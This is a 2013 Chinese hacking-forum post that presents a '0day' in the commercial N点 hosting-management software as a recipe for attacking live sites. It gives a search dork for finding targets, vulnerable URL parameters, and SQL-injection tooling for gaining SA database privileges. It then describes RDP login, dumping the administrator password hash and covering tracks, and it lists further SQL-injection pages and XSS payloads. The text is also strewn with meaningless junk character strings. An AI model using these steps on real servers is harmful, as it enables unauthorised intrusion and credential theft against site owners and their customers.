中国网络渗透测试联盟

标题: N点商业版漏洞通杀0day以及利用方法 [打印本页]

作者: admin    时间: 2013-3-3 08:06
标题: N点商业版漏洞通杀0day以及利用方法
不得不说N点实在是一个破东西) W8 g1 v2 @8 U  k, r6 H
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂4 k) f; I9 h; E( G
好吧 抱怨一下就行了  接下来关键的时候到了
% _3 y7 U5 l, }3 G! d$ N( y" L首先百度搜索关键字:inurl: (mmdatabase.asp)  {0 H" X8 O  E6 A
我随便列举一个:   www.xxxx.com
1 E/ o7 r* c# z2 W2 j修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=16 ^2 Q. ^  Q1 \
扔入NBSI 或者啊D等各种傻逼工具后
7 ?9 j& g4 L- T+ k你们会看到是SA权限
2 {" c+ {2 J2 c果断3389 上去  hash得到administrator密码+ Y9 l+ a% u$ n4 D  m) x4 [/ T
擦屁股走人~
5 p, E. }( [% b3 c7 i: p: g经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的, z; [0 b+ e& W( d& l

+ f. E( K+ A8 l% z5 R再附上其他几个漏洞页面
- |. X8 V9 N' \* r: P% x0 s$ SSQL:
8 ^/ I+ [. [4 Q+ o3 uhttp://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
, m" m' E$ M5 N3 T9 A% qhttp://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=114 n6 w6 G, D7 w& q" J
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
" y7 e7 ~" V* b% Z( chttp://www.xxxxxx.com:80/Style/vhosting.asp?classID=2# N: e* ?% {: w) @- A2 y
XSS证明:
: g# ], e6 h+ |. s" j* B6 q; Zhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
) M+ i4 u: n9 C+ b4 [9 Y& xhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
- k( z: x! W* g( I1 W4 J4 y( bhttp://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>- R7 W  N! O( r" f  e
由此可见点就是坑逼中的战斗机   自从用了他我的眼泪都流干了  有做IDC的朋友千万别步我后尘啊   便宜没好货好货不便宜0 b8 U% C# ~0 [7 M+ \( T: C% Z, m) ?
还是星外吧  你们懂的5 s) i. R) F+ g+ _5 i+ t
作为一个商用程序   安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
4 o: ~6 U' a: ?PS:其实我真的很想知道你说N点这SB asp就asp吧  为什么asp还非要MSSQL  这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。   o(︶︿︶)o 唉  T  Y/ _$ \0 R2 Z! U9 V1 A/ R- c
——-




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2